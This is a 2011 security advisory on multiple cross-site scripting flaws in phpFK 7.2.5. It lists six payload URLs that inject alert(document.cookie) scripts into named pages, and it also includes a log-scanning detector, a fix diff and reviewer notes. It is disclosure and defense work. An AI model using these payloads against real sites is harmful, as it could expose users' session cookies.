SSCHADV2011-022 - phpFK 7.2.5 Multiple Cross-site Scripting vulnerabilities
Advisory: phpFK 7.2.5 Multiple Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2011-022
Author: Stefan Schurtz
Affected Software: Successfully tested on phpFK 7.2.5
Vendor URL:
Vendor Status: informed
CVE-ID: -
======================
Vulnerability Description:
======================
phpFK 7.2.5 is prone to multiple cross-site scripting vulnerabilities.
==============
Technical Details:
==============
http://<target>/phpfk/faq.php?'"/><script>alert(document.cookie)</script>
http://<target>/phpfk/ranking.php?'"/><script>alert(document.cookie)</script>
http://<target>/phpfk/search.php?'"/><script>alert(document.cookie)</script>
http://<target>/phpfk/ranking.php?sort=0&page=1'"/><script>alert(document.cookie)</script>
http://<target>/phpfk/user.php?user='"/><script>alert(document.cookie)</script>

Backend
http://<target>/phpfk/ap/?nav=user&page=groups_edit&group='</style></script><script>alert(document.cookie)</script>
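Added example (not part of the original advisory or of phpFK): a Python check that flags access-log requests to the scripts listed above whose decoded query string contains markup characters. The /phpfk/ path follows the URLs above; the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Scripts named under Technical Details; the /phpfk/ prefix is an assumption.
PHPFK_PATH = re.compile(r"/phpfk/(?:(?:faq|ranking|search|user)\.php|ap/?)$", re.I)
# Characters needed to close an attribute or open a tag in reflected output.
MARKUP = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Oct/2011:10:00:01 +0200] "GET /phpfk/ranking.php?sort=0&page=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [04/Oct/2011:10:02:13 +0200] "GET /phpfk/ranking.php?sort=0&page=1%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5344',
    '192.0.2.44 - - [04/Oct/2011:10:02:40 +0200] "GET /phpfk/user.php?user=%2527%2522%253E HTTP/1.1" 200 4011',
    '192.0.2.77 - - [04/Oct/2011:10:05:00 +0200] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]


def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (double-encoding evasion)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_lines):
    """Return (path, decoded_query) for phpFK requests whose query carries markup."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        try:
            parts = urlsplit(match.group(1))
        except ValueError:  # malformed request target, nothing to inspect
            continue
        query = decode_fully(parts.query)
        if PHPFK_PATH.search(parts.path) and MARKUP.search(query):
            hits.append((parts.path, query))
    return hits


if __name__ == "__main__":
    for path, query in suspicious_requests(SAMPLE_LOG):
        print(path, repr(query))
```

Legitimate search terms containing quotes will also match on search.php, so treat hits as leads to review rather than confirmed attempts.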
=====
Solution:
=====
ranking.php
- <td class="oben"><a href="ranking.php?sort=0&page=’.$_GET[‘page’].’">‘.$_TEXT[’LOGIN_USERNAME‘].’</a></td> + <td class="oben"><a href="ranking.php?sort=0&page=’.htmlentities($_GET[‘page’]).’">‘.$_TEXT[’LOGIN_USERNAME‘].’</a></td> – <td class="oben"><a href="ranking.php?sort=1&page=’.$_GET[‘page’].’">‘.$_TEXT[’POINTS‘].’</a></td> + <td class="oben"><a href="ranking.php?sort=1&page=’.htmlentities($_GET[‘page’]).’">‘.$_TEXT[’POINTS‘].’</a></td> – <td class="oben"><a href="ranking.php?sort=2&page=’.$_GET[‘page’].’">‘.$_TEXT[’TIME_OF_REGISTRATION‘].’</a></td> + <td class="oben"><a href="ranking.php?sort=2&page=’.htmlentities($_GET[‘page’]).’">‘.$_TEXT[’TIME_OF_REGISTRATION‘].’</a></td> – <td class="oben"><a href="ranking.php?sort=3&page=’.$_GET[‘page’].’">‘.$_TEXT[’TIME_OF_LAST_VISIT‘].’</a></td> + <td class="oben"><a href="ranking.php?sort=3&page=’.htmlentities($_GET[‘page’]).’">‘.$_TEXT[’TIME_OF_LAST_VISIT‘].’</a></td> |
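Review bot: in all four sort links of ranking.php, page is a page number, so casting it with (int)$_GET['page'] would be stricter than htmlentities($_GET['page']) and would keep non-numeric values out of the link entirely. If htmlentities() stays, pass ENT_QUOTES and an explicit charset: on PHP versions before 8.1 the default flag is ENT_COMPAT, which leaves single quotes unencoded, so the fix only holds while the href attribute stays double-quoted as it is here.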
include/page_top.php
- <form action="’.$url.’" name="login" method="post">
+ <form action="’.htmlentities($url).’" name="login" method="post"> |
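Review bot: the form action fix in include/page_top.php encodes $url only at this one output point, and the hunk does not show where $url is built, so confirm that no other template prints it unencoded. Neither hunk touches the user parameter of user.php or the group parameter of the backend groups_edit page listed under Technical Details; both still need output encoding. The backend test string closes style and script elements first, which suggests the value may land in a context where htmlentities() alone is not sufficient.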
================
Disclosure Timeline:
================
02-Oct-2011 – informed developers
04-Oct-2011 – release date of this security advisory
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.frank-karau.de/
http://www.rul3z.de/advisories/SSCHADV2011-022.txt